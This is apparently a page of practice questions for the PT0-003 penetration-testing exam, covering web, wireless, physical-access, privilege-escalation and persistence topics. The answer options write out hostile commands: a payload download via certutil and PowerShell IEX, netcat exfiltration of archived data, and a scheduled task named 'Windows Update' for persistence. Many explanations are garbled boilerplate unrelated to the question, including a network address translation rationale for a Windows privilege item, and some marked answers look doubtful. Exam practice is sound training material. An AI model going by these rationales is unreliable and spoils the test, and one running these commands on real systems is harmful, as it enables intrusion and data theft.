πŸ”

PT0-003 β€” questions

Page 4 of 17 Β· 334 total questions.

Topic 1 Β· Question 61

A penetration tester is attempting to discover vulnerabilities in a company's web application. Which of the following tools would most likely assist with testing the security of the web application?

  • AOpenVAS
  • BNessus
  • Csqlmap
  • DNikto (correct answer)
Reveal answer & explanation
Correct answer: D

The correct answer is D. Option D: Nikto This option keeps traffic private / properly secured as required.

Topic 1 Β· Question 62

During a red-team exercise, a penetration tester obtains an employee's access badge. The tester uses the badge's information to create a duplicate for unauthorized entry. Which of the following best describes this action?

  • ASmurfing
  • BCredential stuffing
  • CRFID cloning (correct answer)
  • DCard skimming
Reveal answer & explanation
Correct answer: C

The correct answer is C. Option C: RFID cloning

Topic 1 Β· Question 63

During an engagement, a penetration tester needs to break the key for the Wi-Fi network that uses WPA2 encryption. Which of the following attacks would accomplish this objective?

  • AChopChop
  • BReplay
  • CInitialization vector
  • DKRACK (correct answer)
Reveal answer & explanation
Correct answer: D

The correct answer is D. Option D: KRACK This option keeps traffic private / properly secured as required.

Topic 1 Β· Question 64

A penetration tester is researching a path to escalate privileges. While enumerating current user privileges, the tester observes the following output: Which of the following privileges should the tester use to achieve the goal?

Exhibit 1 for question 64
  • ASeImpersonatePrivilege (correct answer)
  • BSeCreateGlobalPrivilege
  • CSeChangeNotifyPrivilege
  • DSeManageVolumePrivilege
Reveal answer & explanation
Correct answer: A

The correct answer is A. Option A: SeImpersonatePrivilege

Explanation

Network address translation maps addresses between networks and commonly lets private hosts share public connectivity.

Topic 1 Β· Question 65

During a routine penetration test, the client's security team observes logging alerts that indicate several ID badges were reprinted after working hours without the appropriate authorization. Which of the following is the penetration tester most likely trying to do?

  • AObtain long-term, valid access to the facility. (correct answer)
  • BDisrupt the availabilty of facility access systems.
  • CChange access to the facility for valid users.
  • DRevoke access to the facility for valid users.
Reveal answer & explanation
Correct answer: A

The correct answer is A. Option A: Obtain long-term, valid access to the facility. This option keeps traffic private / properly secured as required.

Topic 1 Β· Question 66

As part of an engagement, a penetration tester wants to maintain access to a compromised system after rebooting. Which of the following techniques would be best for the tester to use?

  • AEstablishing a reverse shell
  • BExecuting a process injection attack
  • CCreating a scheduled task (correct answer)
  • DPerforming a credential-dumping attack
Reveal answer & explanation
Correct answer: C

The correct answer is C. Option C: Creating a scheduled task

Topic 1 Β· Question 67

A penetration tester needs to scan a remote infrastructure with Nmap. The tester issues the following command: nmap 10.10.1.0/24 Which of the following is the number of TCP ports that will be scanned?

  • A256
  • B1,000 (correct answer)
  • C1,024
  • D65,535
Reveal answer & explanation
Correct answer: B

The correct answer is B. Option B: 1,000

Topic 1 Β· Question 68

During an assessment, a penetration tester gains access to one of the internal hosts. Given the following command: schtasks /create /tn "Windows Update" /sc onlogon /tr β€œcmd.exe /c update.exe” Which of the following is the penetration tester trying to do with this code?

  • AEnumerate the scheduled tasks.
  • BEstablish persistence. (correct answer)
  • CDeactivate the Windows Update functionality.
  • DCreate a binary application for Windows System Updates.
Reveal answer & explanation
Correct answer: B

The correct answer is B. Option B: Establish persistence.

Topic 1 Β· Question 69

Given the following statements: Implement a web application firewall. Upgrade end-of-life operating systems. Implement a secure software development life cycle. In which of the following sections of a penetration test report would the above statements be found?

  • AExecutive summary
  • BAttack narrative
  • CDetailed findings
  • DRecommendations (correct answer)
Reveal answer & explanation
Correct answer: D

The correct answer is D. Option D: Recommendations This option keeps traffic private / properly secured as required.

Topic 1 Β· Question 70

Which of the following is within the scope of proper handling and most crucial when working on a penetration testing report?

  • AKeeping both video and audio of everything that is done
  • BKeeping the report to a maximum of 5 to 10 pages in length
  • CBasing the recommendation on the risk score in the report
  • DMaking the report clear for all objectives with a precise executive summary (correct answer)
Reveal answer & explanation
Correct answer: D

The correct answer is D. Option D: Making the report clear for all objectives with a precise executive summary

Topic 1 Β· Question 73

A penetration tester aims to exploit a vulnerability in a wireless network that lacks proper encryption. The lack of proper encryption allows malicious content to infiltrate the network. Which of the following techniques would most likely achieve the goal?

  • APacket injection (correct answer)
  • BBluejacking
  • CBeacon flooding
  • DSignal jamming
Reveal answer & explanation
Correct answer: A

The correct answer is A. Option A: Packet injection This option keeps traffic private / properly secured as required.

Topic 1 Β· Question 74

A penetration tester gains initial access to an endpoint and needs to execute a payload to obtain additional access. Which of the following commands should the penetration tester use?

  • Apowershell.exe impo C:\tools\foo.ps1
  • Bcertutil.exe -f https://192.168.0.1/foo.exe bad.exe
  • Cpowershell.exe -noni -encode IEX.DownloadString("http://172.16.0.1/")
  • Drundll32.exe c:\path\foo.dll,functName (correct answer)
Reveal answer & explanation
Correct answer: D

The correct answer is D. Option D: rundll32.exe c:\path\foo.dll,functName

Topic 1 Β· Question 75

A penetration tester obtains password dumps associated with the target and identifies strict lockout policies. The tester does not want to lock out accounts when attempting access. Which of the following techniques should the tester use?

  • ACredential stuffing (correct answer)
  • BMFA fatigue
  • CDictionary attack
  • DBrute-force attack
Reveal answer & explanation
Correct answer: A

The correct answer is A. Option A: Credential stuffing

Topic 1 Β· Question 76

A penetration tester obtains the following output during an Nmap scan: Which of the following should be the next step for the tester?

Exhibit 1 for question 76
  • ASearch for vulnerabilities on msrpc.
  • BEnumerate shares and search for vulnerabilities on the SMB service. (correct answer)
  • CExecute a brute-force attack against the Remote Desktop Services.
  • DExecute a new Nmap command to search for another port.
Reveal answer & explanation
Correct answer: B

The correct answer is B. Option B: Enumerate shares and search for vulnerabilities on the SMB service.

Topic 1 Β· Question 77

A penetration tester has been asked to conduct a blind web application test against a customer's corporate website. Which of the following tools would be best suited to perform this assessment?

  • AZAP (correct answer)
  • BNmap
  • CWfuzz
  • DTrufflehog
Reveal answer & explanation
Correct answer: A

The correct answer is A. Option A: ZAP

Topic 1 Β· Question 78

A tester enumerated a firewall policy and now needs to stage and exfiltrate data captured from the engagement. Given the following firewall policy: Which of the following commands should the tester try next?

Exhibit 1 for question 78
  • Atar -zcvf /tmp/data.tar.gz /path/to/data && nc -w 3 443 < /tmp/data.tar.gz (correct answer)
  • Bgzip /path/to/data && cp data.gz 443
  • Cgzip /path/to/data && nc -nvlk 443; cat data.gz | nc -w 3 22
  • Dtar -zcvf /tmp/data.tar.gz /path/to/data && scp /tmp/data.tar.gz
Reveal answer & explanation
Correct answer: A

The correct answer is A. Option A: tar -zcvf /tmp/data.tar.gz /path/to/data && nc -w 3 443 < /tmp/data.tar.gz

Topic 1 Β· Question 79

Which of the following post-exploitation activities allows a penetration tester to maintain persistent access in a compromised system?

  • ACreating registry keys (correct answer)
  • BInstalling a bind shell
  • CExecuting a process injection
  • DSetting up a reverse SSH connection
Reveal answer & explanation
Correct answer: A

The correct answer is A. Option A: Creating registry keys

Topic 1 Β· Question 80

A penetration tester compromises a Windows OS endpoint that is joined to an Active Directory local environment. Which of the following tools should the tester use to manipulate authentication mechanisms to move laterally in the network?

  • ARubeus (correct answer)
  • BWinPEAS
  • CNTLMRelayX
  • DImpacket
Reveal answer & explanation
Correct answer: A

The correct answer is A. Option A: Rubeus

Topic 1 Β· Question 81

A penetration tester identifies the following open ports during a network enumeration scan: Which of the following commands did the tester use to get this output?

Exhibit 1 for question 81
  • Anmap -Pn -A 10.10.10.10
  • Bnmap -sV 10.10.10.10
  • Cnmap -Pn -vv 10.10.10.10
  • Dnmap -sV -Pn -p- 10.10.10.10 (correct answer)
Reveal answer & explanation
Correct answer: D

The correct answer is D. Option D: nmap -sV -Pn -p- 10.10.10.10

Topic 1 Β· Question 82

In a cloud environment, a security team discovers that an attacker accessed confidential information that was used to configure virtual machines during their initialization. Through which of the following features could this information have been accessed?

  • AIAM
  • BBlock storage
  • CVirtual private cloud
  • DMetadata services (correct answer)
Reveal answer & explanation
Correct answer: D

The correct answer is D. Option D: Metadata services This option keeps traffic private / properly secured as required.

Showing questions 61–80 of 334 Β· Page 4 of 17